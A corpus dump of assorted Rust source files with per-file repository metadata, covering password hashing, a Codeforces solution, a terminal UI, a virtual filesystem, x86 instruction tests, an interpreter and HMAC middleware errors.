//! An implementation of Catena-Dragonfly. This variant of Catena provides //! memory hardness. It should be used in a setting, where the defender can //! afford to allocate much memory without any problems. /// The choices for H, H', F, Γ and Φ for Catena-Dragonfly. /// /// These choices are: /// /// - H: Blake2b /// - H': Blake2b-1 /// - F: BRH(21,2) /// - Γ: SaltMix /// - Φ: Identity function #[derive(Clone, Copy, Debug)] pub struct DragonflyAlgorithms { blake2b_1: ::components::fasthash::blake2b1::Blake2b1, } impl ::catena::Algorithms for DragonflyAlgorithms { fn h (&self, x: &Vec<u8>) -> Vec<u8> { ::components::hash::blake2b::hash(x) } fn h_prime (&mut self, x: &Vec<u8>) -> Vec<u8> { self.blake2b_1.hash(x) } fn reset_h_prime(&mut self) { self.blake2b_1.reset(); } fn gamma (&mut self, garlic:u8, state: Vec<u8>, gamma: &Vec<u8>, k: usize) -> Vec<u8> { ::components::gamma::saltmix::saltmix(self, garlic, state, gamma, k) } fn f (&mut self, garlic: &u8, state: &mut Vec<u8>, lambda: u8, n: usize, k: usize) -> Vec<u8> { ::components::graph::generic_graph::bit_reversal_hash( self, garlic, state, lambda, n, k) } #[allow(unused_variables)] fn phi (&mut self, garlic: u8, state: Vec<u8>, mu: &Vec<u8>, k: usize) -> Vec<u8> { state } } /// Constructor for a Catena-Dragonfly instance. pub fn new() -> ::catena::Catena<DragonflyAlgorithms> { let df_algorithms = DragonflyAlgorithms { blake2b_1: Default::default(), }; ::catena::Catena { algorithms: df_algorithms, vid: "Dragonfly", n: 64, k: 64, g_low: 21, g_high: 21, lambda: 2, } }
true
63ac2ee4b4918832a2c4a9b5d59ce657565771b5
Rust
Vicfred/codeforces-rust
/fancy_fence_270A.rs
UTF-8
487
3.015625
3
[ "BSD-3-Clause" ]
permissive
// https://codeforces.com/problemset/problem/270/A // simple math use std::io; fn main() { let mut t = String::new(); io::stdin() .read_line(&mut t) .unwrap(); let t: i64 = t.trim().parse().unwrap(); for _ in 0..t { let mut a = String::new(); io::stdin() .read_line(&mut a) .unwrap(); let a: i64 = a.trim().parse().unwrap(); if 360%(180-a) == 0 { println!("YES"); } else { println!("NO"); } } }
true
f22e92d99ceec8ef45926b92fb54099eebbc5f3c
Rust
simvux/rust-discord-tui
/src/discord/message.rs
UTF-8
1,819
3.234375
3
[]
no_license
use std::fmt; use termion::color; use tui::style::{Color, Style}; use tui::widgets::Text; pub enum Embed { Link(String), Image(String), Video(String), Nothing, } pub struct Message { pub content: String, pub embed: Embed, pub author: String, } impl Message { pub fn new(author: &str, content: &str, embed: Embed) -> Self { Message { author: author.to_owned(), content: content.to_owned(), embed: embed, } } pub fn author(&self) -> Text { Text::styled(&self.author, Style::default().fg(Color::Green)) } pub fn embed(&self) -> Text { let (link, color) = match &self.embed { Embed::Nothing => return Text::raw("\n"), Embed::Image(link) => (link, Color::Cyan), Embed::Link(link) => (link, Color::Blue), Embed::Video(link) => (link, Color::Red), }; let mut out = String::new(); out.push_str("\n - "); out.push_str(link); out.push_str("\n"); return Text::styled(out, Style::default().fg(color)); } } impl fmt::Display for Message { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!( f, "{}{}: {}{} {}{}", color::Fg(color::Red), self.author, color::Fg(color::Reset), self.content, match &self.embed { Embed::Nothing => String::from(""), Embed::Link(l) => format!("\n - {}{}", color::Fg(color::Green), l), Embed::Image(l) => format!("\n - {}{}", color::Fg(color::LightGreen), l), Embed::Video(l) => format!("\n - {}{}", color::Fg(color::LightGreen), l), }, color::Fg(color::Reset) ) } }
true
0e62debc8ded8d531c8d154a8e5f6da683762e3f
Rust
bgbahoue/amiwo
/src/macros.rs
UTF-8
1,711
3.09375
3
[ "MIT" ]
permissive
//! ## Macros //! //! This module defines the following macros //! //! - hyper_request! : pseudo function `fn hyper_request(hyper::method::Method, url: hyper::client::IntoUrl, [headers: hyper::header::Headers], [body: Into<hyper::body::Body<'a>>]) -> Result<amiwo::contrib::rocket::ResponseJSON, GenericError>` //! - amiwo_error! : pseudo functions //! `fn amiwo_error(description: ToString, cause: GenericError) -> Result<_, amiwo::GenericError::Compound>` //! `fn amiwo_error(error) -> Result<_, amiwo::GenericError::Basic>` // ======================================================================= // MACRO DEFINITIONS // ======================================================================= macro_rules! amiwo_error { ($description:expr, $cause:expr) => { Err(GenericError::new_compound($description, $cause)) }; ($error:expr) => { Err(GenericError::Basic($error)) }; } // ======================================================================= // UNIT TESTS // ======================================================================= #[cfg(test)] mod tests { #![allow(non_snake_case)] use std::error::Error; use error::GenericError; #[test] fn macros_test_compound() { let err : Result<(), _> = amiwo_error!("test description", GenericError::Basic("Test error".to_string())); let err = err.unwrap_err(); assert_eq!(err.description(), "test description caused by Test error"); match err.cause() { Some(err) => { assert_eq!(err.description(), "Test error"); assert!(err.cause().is_none()); }, _ => panic!("invalid cause"), } } }
true
61c2006fb64792cc2b66ac8a4067c5c5b6071929
Rust
frankfanslc/evfs
/src/local_fs.rs
UTF-8
3,081
2.984375
3
[ "MIT" ]
permissive
use crate::{EntryType, InternalError, RecvMsg, VfsDriver, VfsError}; use log::*; use std::fs::File; use std::io::Read; use std::path::Path; #[derive(Clone)] pub struct LocalFs { root: String, } impl LocalFs { pub fn new() -> LocalFs { LocalFs { root: String::new(), } } } impl VfsDriver for LocalFs { fn is_remote(&self) -> bool { false } fn can_mount(&self, _target: &str, source: &str) -> Result<(), VfsError> { // special case for source of current dir if source == "" { return Ok(()); } let metadata = std::fs::metadata(source)?; if metadata.is_file() { Err(VfsError::UnsupportedMount { mount: source.into(), }) } else { Ok(()) } } fn new_from_path(&self, path: &str) -> Result<Box<dyn VfsDriver>, VfsError> { Ok(Box::new(LocalFs { root: path.into() })) } /// /// Read a file from the local filesystem. /// TODO: Make the 5 meg size configurable fn load_file( &self, path: &str, send_msg: &crossbeam_channel::Sender<RecvMsg>, ) -> Result<Box<[u8]>, InternalError> { let path = Path::new(&self.root).join(path); let metadata = std::fs::metadata(&path)?; let len = metadata.len() as usize; let mut file = File::open(&path)?; let mut output_data = vec![0u8; len]; trace!("vfs: reading from {:#?}", path); // if the file is smaller than 5 meg we just load it fully directly to memory if len < 5 * 1024 * 1024 { send_msg.send(RecvMsg::ReadProgress(0.0))?; file.read_exact(&mut output_data)?; } else { // above 5 meg we read in 10 chunks let loop_count = 10; let block_len = len / loop_count; let mut percent = 0.0; let percent_step = 1.0 / loop_count as f32; for i in 0..loop_count { let block_offset = i * block_len; // the last chunk also picks up the remainder left by the integer division let read_amount = if i + 1 == loop_count { len - block_offset } else { block_len }; file.read_exact(&mut output_data[block_offset..block_offset + read_amount])?; send_msg.send(RecvMsg::ReadProgress(percent))?; percent += percent_step; } } //send_msg.send(RecvMsg::ReadDone(output_data.into_boxed_slice()))?; Ok(output_data.into_boxed_slice()) } fn has_entry(&self, path: &str) -> EntryType { let path = Path::new(&self.root).join(path); if let Ok(metadata) = std::fs::metadata(path) { if metadata.is_file() { EntryType::File } else { EntryType::Directory } } else { EntryType::NotFound } } // local fs can't decompress anything fn can_decompress(&self, _data: &[u8]) -> bool { false } // local fs supports any file ext fn supports_file_ext(&self, _file_ext: &str) -> bool { true } }
true
83cdd887147ee089c9b9dfa4f42874c3c64f8d47
Rust
ftilde/rust-x86asm
/src/test/instruction_tests/instr_btc.rs
UTF-8
15,390
2.578125
3
[ "MIT" ]
permissive
use instruction_def::*; use test::run_test; use Operand::*; use Reg::*; use RegScale::*; use RegType::*; use {BroadcastMode, Instruction, MaskReg, MergeMode, Mnemonic, OperandSize, Reg, RoundingMode}; #[test] fn btc_1() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(BX)), operand2: Some(Literal8(35)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 251, 35], OperandSize::Word, ) } #[test] fn btc_2() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectDisplaced(DI, 9, Some(OperandSize::Word), None)), operand2: Some(Literal8(18)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 125, 9, 18], OperandSize::Word, ) } #[test] fn btc_3() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(SI)), operand2: Some(Literal8(69)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 254, 69], OperandSize::Dword, ) } #[test] fn btc_4() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectDisplaced( EAX, 1407864443, Some(OperandSize::Word), None, )), operand2: Some(Literal8(125)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 184, 123, 78, 234, 83, 125], OperandSize::Dword, ) } #[test] fn btc_5() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(DI)), operand2: Some(Literal8(54)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 255, 54], OperandSize::Qword, ) } #[test] fn btc_6() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Indirect(RDI, Some(OperandSize::Word), None)), operand2: Some(Literal8(92)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 63, 92], OperandSize::Qword, ) } #[test] fn btc_7() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(EDI)), operand2: Some(Literal8(90)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 255, 90], OperandSize::Word, ) } #[test] fn btc_8() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledIndexedDisplaced( BX, SI, One, 26427, Some(OperandSize::Dword), None, )), operand2: Some(Literal8(64)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 186, 184, 59, 103, 64], OperandSize::Word, ) } #[test] fn btc_9() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(ESP)), operand2: Some(Literal8(48)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 252, 48], OperandSize::Dword, ) } #[test] fn btc_10() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectDisplaced( ESI, 424257545, Some(OperandSize::Dword), None, )), operand2: Some(Literal8(55)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 190, 9, 168, 73, 25, 55], 
OperandSize::Dword, ) } #[test] fn btc_11() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(EDX)), operand2: Some(Literal8(54)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 250, 54], OperandSize::Qword, ) } #[test] fn btc_12() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledDisplaced( RDX, Four, 1238391808, Some(OperandSize::Dword), None, )), operand2: Some(Literal8(17)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 186, 60, 149, 0, 92, 208, 73, 17], OperandSize::Qword, ) } #[test] fn btc_13() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(RDX)), operand2: Some(Literal8(59)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[72, 15, 186, 250, 59], OperandSize::Qword, ) } #[test] fn btc_14() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledDisplaced( RDX, Four, 1833667555, Some(OperandSize::Qword), None, )), operand2: Some(Literal8(42)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[72, 15, 186, 60, 149, 227, 139, 75, 109, 42], OperandSize::Qword, ) } #[test] fn btc_15() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(DI)), operand2: Some(Direct(DI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 255], OperandSize::Word, ) } #[test] fn btc_16() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectDisplaced(BP, 129, Some(OperandSize::Word), None)), operand2: Some(Direct(CX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 142, 129, 0], OperandSize::Word, ) } #[test] fn btc_17() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(CX)), operand2: Some(Direct(SI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 241], OperandSize::Dword, ) } #[test] fn btc_18() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectDisplaced( EAX, 387689954, Some(OperandSize::Word), None, )), operand2: Some(Direct(DX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 144, 226, 173, 27, 23], OperandSize::Dword, ) } #[test] fn btc_19() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(SI)), operand2: Some(Direct(DI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 254], OperandSize::Qword, ) } #[test] fn btc_20() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledIndexed( RDX, RCX, Eight, Some(OperandSize::Word), None, )), operand2: Some(Direct(SI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 52, 202], OperandSize::Qword, ) } #[test] fn btc_21() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(EBX)), operand2: 
Some(Direct(ECX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 203], OperandSize::Word, ) } #[test] fn btc_22() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Indirect(SI, Some(OperandSize::Dword), None)), operand2: Some(Direct(EBP)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[102, 15, 187, 44], OperandSize::Word, ) } #[test] fn btc_23() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(EBX)), operand2: Some(Direct(EDI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 251], OperandSize::Dword, ) } #[test] fn btc_24() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledIndexedDisplaced( EDX, EBX, Two, 694273384, Some(OperandSize::Dword), None, )), operand2: Some(Direct(EDX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 148, 90, 104, 197, 97, 41], OperandSize::Dword, ) } #[test] fn btc_25() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(ESP)), operand2: Some(Direct(ECX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 204], OperandSize::Qword, ) } #[test] fn btc_26() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledIndexed( RSI, RAX, Four, Some(OperandSize::Dword), None, )), operand2: Some(Direct(EBX)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[15, 187, 28, 134], OperandSize::Qword, ) } #[test] fn btc_27() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(Direct(RBP)), operand2: Some(Direct(RDI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[72, 15, 187, 253], OperandSize::Qword, ) } #[test] fn btc_28() { run_test( &Instruction { mnemonic: Mnemonic::BTC, operand1: Some(IndirectScaledIndexed( RDX, RBX, Four, Some(OperandSize::Qword), None, )), operand2: Some(Direct(RSI)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None, }, &[72, 15, 187, 52, 154], OperandSize::Qword, ) }
true
698e6a19185f20d159974b697f9b6d0bc37019ea
Rust
bpowers/liquid-types
/src/eval.rs
UTF-8
7,862
3.09375
3
[ "Apache-2.0", "MIT" ]
permissive
use std::collections::HashMap; use crate::common::Op2; use crate::lambdal::{Expr, Imm, Op}; type Closure = HashMap<String, Value>; #[derive(PartialEq, Eq, Debug, Clone)] pub enum Value { VInt(i64), VBool(bool), VClosure(Box<Closure>, String, Box<Expr>), VIntArray(Vec<i64>), } fn vint(v: Value) -> i64 { match v { Value::VInt(i) => i, _ => panic!("unreachable -- expected int not {:?}", v), } } fn vbool(v: Value) -> bool { match v { Value::VBool(b) => b, _ => panic!("unreachable -- expected bool not {:?}", v), } } fn vclosure(v: Value) -> (Box<Closure>, String, Box<Expr>) { match v { Value::VClosure(ctx, id, e) => (ctx, id, e), _ => panic!("unreachable -- expected closure not {:?}", v), } } fn vintarray(v: Value) -> Vec<i64> { match v { Value::VIntArray(a) => a, _ => panic!("unreachable -- expected intarray not {:?}", v), } } fn eval_op2(ctx: &Closure, op: Op2, l: &Op, r: &Op) -> Value { use self::Value::*; use crate::common::Op2::*; // all binary ops operate on ints, and at this point have passed // typechecking match op { LT | LTE | GT | GTE | Eq | Add | Sub | Mul => { let vl = vint(eval_op(ctx, l)); let vr = vint(eval_op(ctx, r)); match op { LT => VBool(vl < vr), LTE => VBool(vl <= vr), GT => VBool(vl > vr), GTE => VBool(vl >= vr), Eq => VBool(vl == vr), Add => VInt(vl + vr), Sub => VInt(vl - vr), Mul => VInt(vl * vr), _ => panic!("unreachable numerical op {:?}", op), } } And | Or | Impl | Iff => { let vl = vbool(eval_op(ctx, l)); let vr = vbool(eval_op(ctx, r)); match op { And => VBool(vl && vr), Or => VBool(vl || vr), _ => panic!("unreachable logic op {:?}", op), } } } } fn subst_imm(ctx: &Closure, id: &str, fix: &Imm, i: &Imm) -> Imm { use crate::lambdal::Imm::*; match i { Bool(b) => Bool(*b), Int(n) => Int(*n), Var(x) => { if x == id { fix.clone() } else { Var(x.clone()) } } Fun(vid, e) => { let e = Box::new(subst_expr(ctx, id, fix, e)); Fun(vid.clone(), e) } Fix(vid, e) => { let e = Box::new(subst_expr(ctx, id, fix, e)); Fix(vid.clone(), e) } V | Star => unreachable!("ν or ★ encountered during subst"), } } fn subst_op(ctx: &Closure, id: &str, fix: &Imm, o: &Op) -> Op { use crate::lambdal::Op::*; match o { Op2(op, e1, e2) => { let e1 = Box::new(subst_op(ctx, id, fix, e1)); let e2 = Box::new(subst_op(ctx, id, fix, e2)); Op2(*op, e1, e2) } MkArray(sz, n) => { let sz = Box::new(subst_imm(ctx, id, fix, sz)); let n = Box::new(subst_imm(ctx, id, fix, n)); MkArray(sz, n) } GetArray(iid, idx) => { let iid = Box::new(subst_imm(ctx, id, fix, iid)); let idx = Box::new(subst_imm(ctx, id, fix, idx)); GetArray(iid, idx) } SetArray(iid, idx, v) => { let iid = Box::new(subst_imm(ctx, id, fix, iid)); let idx = Box::new(subst_imm(ctx, id, fix, idx)); let v = Box::new(subst_imm(ctx, id, fix, v)); SetArray(iid, idx, v) } Imm(imm) => Imm(subst_imm(ctx, id, fix, imm)), } } // fixpoint substitution fn subst_expr(ctx: &Closure, id: &str, fix: &Imm, e: &Expr) -> Expr { use crate::lambdal::Expr::*; match e { If(e1, e2, e3) => { let e1 = Box::new(subst_imm(ctx, id, fix, e1)); let e2 = Box::new(subst_expr(ctx, id, fix, e2)); let e3 = Box::new(subst_expr(ctx, id, fix, e3)); If(e1, e2, e3) } Let(vid, e1, e2) => { let e1 = Box::new(subst_expr(ctx, id, fix, e1)); let e2 = Box::new(subst_expr(ctx, id, fix, e2)); Let(vid.clone(), e1, e2) } App(e1, e2) => { let e1 = Box::new(subst_imm(ctx, id, fix, e1)); let e2 = Box::new(subst_imm(ctx, id, fix, e2)); App(e1, e2) } Op(op) => Op(subst_op(ctx, id, fix, op)), } } fn eval_imm(ctx: &Closure, i: &Imm) -> Value { use self::Value::*; use crate::lambdal::Imm::*; match i { 
Bool(b) => VBool(*b), Int(i) => VInt(*i), Var(id) => match ctx.get(id) { Some(v) => v.clone(), None => panic!("lookup {} in ctx failed: {:?}", id, ctx), }, Fun(id, e) => VClosure(Box::new(ctx.clone()), id.clone(), e.clone()), Fix(id, e) => { let inner = eval(ctx, e); let (_, iid, ie) = vclosure(inner); let substituted_exp = Box::new(subst_expr(ctx, id, i, &ie)); VClosure(Box::new(ctx.clone()), iid, substituted_exp) } V | Star => unreachable!("ν or ★ encountered during subst"), } } fn eval_op(ctx: &Closure, o: &Op) -> Value { use self::Value::*; use crate::lambdal::Op::*; match o { Op2(op, e1, e2) => eval_op2(ctx, *op, e1, e2), MkArray(sz, n) => { let sz = vint(eval_imm(ctx, sz)); let n = vint(eval_imm(ctx, n)); let mut vec = Vec::with_capacity(sz as usize); vec.resize(sz as usize, n); VIntArray(vec) } GetArray(iid, idx) => { let arr = vintarray(eval_imm(ctx, iid)); let idx = vint(eval_imm(ctx, idx)); VInt(arr[idx as usize]) } SetArray(iid, idx, v) => { let mut arr = vintarray(eval_imm(ctx, iid)); let idx = vint(eval_imm(ctx, idx)); let v = vint(eval_imm(ctx, v)); arr[idx as usize] = v; VIntArray(arr) } Imm(imm) => eval_imm(ctx, imm), } } fn eval(ctx: &Closure, expr: &Expr) -> Value { use crate::lambdal::Expr::*; match expr { If(cond, e1, e2) => { if vbool(eval_imm(ctx, cond)) { eval(ctx, e1) } else { eval(ctx, e2) } } App(e1, e2) => { let v = eval_imm(ctx, e2); let (ctx, id, e) = vclosure(eval_imm(ctx, e1)); let mut new_ctx = ctx; new_ctx.insert(id, v); eval(&new_ctx, &e) } Let(id, e1, e2) => { let v1 = eval(ctx, e1); let mut new_ctx = ctx.clone(); new_ctx.insert(id.clone(), v1); eval(&new_ctx, e2) } Op(op) => eval_op(ctx, op), } } pub fn interpret(expr: &Expr) -> Value { let ctx: Closure = HashMap::new(); eval(&ctx, expr) } #[cfg(test)] macro_rules! test_eval( ($s:expr, $v:expr) => { { use crate::implicit_parse::ProgramParser; use crate::tok::Tokenizer; use crate::lambdal; let input = $s; let lexer = Tokenizer::new(&input); let iexpr = ProgramParser::new().parse(input, lexer).unwrap(); let (anf_expr, _) = lambdal::anf(&iexpr).unwrap(); let r = interpret(&anf_expr); if r != $v { die!("mismatch {:?} != {:?}", r, $v); } } } ); #[test] fn eval_results() { use self::Value::*; test_eval!("-22", VInt(-22)); test_eval!("let double = (fun n -> n*2) in double 8", VInt(16)); test_eval!( "let rec factorial = fun x -> if x = 0 then 1 else x * (factorial (x - 1)) in factorial 5", VInt(120) ); }
true
5d5acc62235ced530e528fd61b2efdb746e5caa5
Rust
ponchofiesta/webassembly-tests-rust
/benches/benchmarks.rs
UTF-8
482
2.578125
3
[ "Apache-2.0", "MIT" ]
permissive
#[macro_use]
extern crate criterion;

use criterion::Criterion;
//use criterion::black_box;

//fn a(data: &[f64]) -> f64 {
//    let mut a = 0.0;
//    for i in data {
//        let b: f64 = data.len() as f64 * i;
//        a += b;
//    }
//    a
//}
//
//fn criterion_benchmark(c: &mut Criterion) {
//    let list = [1,2,3,4,5,6,7,8,9];
//    c.bench_function("fib 20", |b| b.iter(|| a(&list)));
//}
//
//criterion_group!(benches, criterion_benchmark);
//criterion_main!(benches);
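// A note on wiring (not from this repository, assumed from criterion's standard setup): with the
// code above uncommented, this file only runs under `cargo bench` if Cargo.toml registers it as a
// bench target with the default harness disabled, e.g.
//
//     [[bench]]
//     name = "benchmarks"
//     harness = false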
true
2fef6da0ea5607167cc677632995f337073dea88
Rust
jwilm/iron-hmac
/src/error.rs
UTF-8
3,041
2.796875
3
[ "Apache-2.0", "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
use std::fmt;
use std::io;

use iron::{IronError, status};
use std::str::Utf8Error;
use rustc_serialize::hex::FromHexError;

/// Error type for the hmac middleware
#[derive(Debug)]
pub enum Error {
    /// Some sort of io::Error occurred
    IoError(io::Error),

    /// The request's provided HMAC is invalid.
    InvalidHmac,

    /// The HMAC header is missing. The String value contains the expected header name.
    MissingHmacHeader(String),

    /// Error occurred while reading request body
    Bodyparser(::bodyparser::BodyError),

    /// Error interpreting byte sequence as utf8
    Utf8Error(Utf8Error),

    /// Error decoding hex
    DecodingHex(FromHexError),
}

pub type Result<T> = ::std::result::Result<T, Error>;

impl fmt::Display for Error {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        match *self {
            Error::MissingHmacHeader(ref key) => write!(f, "Missing Hmac Header (key = {})", key),
            Error::InvalidHmac => write!(f, "Provided HMAC is invalid"),
            Error::IoError(ref err) => write!(f, "IoError({})", err),
            Error::Bodyparser(ref err) => write!(f, "Bodyparser({})", err),
            Error::Utf8Error(ref err) => write!(f, "Utf8Error({})", err),
            Error::DecodingHex(ref err) => write!(f, "DecodingHex({})", err),
        }
    }
}

impl ::std::error::Error for Error {
    fn description(&self) -> &str {
        match *self {
            Error::MissingHmacHeader(_) => "The expected HMAC header is missing",
            Error::InvalidHmac => "Provided HMAC is invalid",
            Error::IoError(ref err) => err.description(),
            Error::Bodyparser(ref err) => err.description(),
            Error::Utf8Error(ref err) => err.description(),
            Error::DecodingHex(ref err) => err.description(),
        }
    }

    fn cause(&self) -> Option<&::std::error::Error> {
        match *self {
            Error::IoError(ref err) => Some(err),
            Error::Bodyparser(ref err) => Some(err),
            Error::Utf8Error(ref err) => Some(err),
            Error::DecodingHex(ref err) => Some(err),
            _ => None
        }
    }
}

impl From<Error> for IronError {
    fn from(err: Error) -> IronError {
        match err {
            Error::MissingHmacHeader(_) => IronError::new(err, status::BadRequest),
            Error::InvalidHmac => IronError::new(err, status::Forbidden),
            Error::DecodingHex(_) => IronError::new(err, status::Forbidden),
            _ => IronError::new(err, status::InternalServerError)
        }
    }
}

impl From<io::Error> for Error {
    fn from(err: io::Error) -> Error {
        Error::IoError(err)
    }
}

impl From<::bodyparser::BodyError> for Error {
    fn from(err: ::bodyparser::BodyError) -> Error {
        Error::Bodyparser(err)
    }
}

impl From<Utf8Error> for Error {
    fn from(err: Utf8Error) -> Error {
        Error::Utf8Error(err)
    }
}

impl From<FromHexError> for Error {
    fn from(err: FromHexError) -> Error {
        Error::DecodingHex(err)
    }
}
true
1c1cf3aa403e062f0015b63a216efdea8e05ec67
Rust
OsProgramadores/op-desafios
/desafio-05/leovano/rust/src/stats/max.rs
UTF-8
1,943
2.78125
3
[]
no_license
use super::{BuildHasher, Entry, Map};
use super::{Funcionario, Salary};
use fields::Text;
use std::sync::Arc;

// Alias: MaxStats->Data
#[allow(dead_code)]
type MaxData<'a> = (usize, Salary, Vec<Arc<Funcionario<'a>>>);

// Alias: MaxStats->Iter
#[allow(dead_code)]
type MaxIter<'a> = (Text<'a>, Salary, Vec<Arc<Funcionario<'a>>>);

// Stats: Max
#[derive(Debug, Default)]
pub struct MaxStats<'a> {
    hash: Map<&'a [u8], MaxData<'a>, BuildHasher>,
}

impl<'a> MaxStats<'a> {
    pub(super) fn update(&mut self, func: &Arc<Funcionario<'a>>) {
        match self.hash.entry(func.sobrenome) {
            Entry::Occupied(e) => {
                let e = e.into_mut();
                e.0 += 1;
                if e.1 < func.salario {
                    e.2.clear();
                    e.1 = func.salario;
                    e.2.push(Arc::clone(func));
                } else if e.1 == func.salario {
                    e.2.push(Arc::clone(func));
                }
            }
            Entry::Vacant(e) => {
                e.insert((1, func.salario, vec![Arc::clone(func)]));
            }
        }
    }

    pub(super) fn merge(&mut self, other: MaxStats<'a>) {
        for (k, mut v) in other.hash {
            match self.hash.entry(k) {
                Entry::Occupied(e) => {
                    let e = e.into_mut();
                    e.0 += v.0;
                    if e.1 < v.1 {
                        e.1 = v.1;
                        e.2 = v.2;
                    } else if e.1 == v.1 {
                        e.2.append(&mut v.2);
                    }
                }
                Entry::Vacant(e) => {
                    e.insert(v);
                }
            }
        }
    }

    #[inline]
    pub fn into_iter(self) -> impl Iterator<Item = MaxIter<'a>> {
        self.hash
            .into_iter()
            .filter(|(_, it)| it.0 > 1)
            .map(|(ln, (_, b, c))| (Text(ln), b, c))
    }
}
true
141c13e752b0f373f75b7797f1ac77bb4ae87a6b
Rust
vinay-swamy/clustereval
/src/lib.rs
UTF-8
12,519
2.703125
3
[ "MIT" ]
permissive
